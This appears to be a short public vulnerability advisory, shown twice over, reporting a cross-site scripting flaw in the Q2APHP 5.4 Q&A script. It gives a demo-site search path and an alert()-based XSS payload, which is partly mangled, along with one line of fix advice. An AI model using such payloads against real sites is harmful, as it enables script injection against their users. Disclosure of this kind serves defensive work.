endLesS
Webmaster
<------------------ header data start ------------------- >
#############################################################
# Application Name : Q2APHP - q&a social network
# Version : 5.4
# Date : 22.10.2015
# Vulnerable Type : Cross-Site Scripting
# Bug Fix Advice : Harmful characters can be filtered out.
# Author : Cyber Warrior | Bug Researchers Group | N4TuraL
# Author Contact : https://twitter.com/byn4tural
# Vendor Homepage : http://codecanyon.net/item/q2aphp-qa-social-network/5124191
# Tested on Demo Site : http://q2aphp-pro.xandr.co/search/profiles
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
>**********alert(N4TuraL);</script**************alert(Cyber Warrior);</script> == X
< -- bug code end of -- >
#############################################################
# Application Name : Q2APHP - q&a social network
# Version : 5.4
# Date : 22.10.2015
# Vulnerable Type : Cross-Site Scripting
# Bug Fix Advice : Harmful characters can be filtered out.
# Author : Cyber Warrior | Bug Researchers Group | N4TuraL
# Author Contact : https://twitter.com/byn4tural
# Vendor Homepage : http://codecanyon.net/item/q2aphp-qa-social-network/5124191
# Tested on Demo Site : http://q2aphp-pro.xandr.co/search/profiles
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
>**********alert(N4TuraL);</script**************alert(Cyber Warrior);</script> == X
< -- bug code end of -- >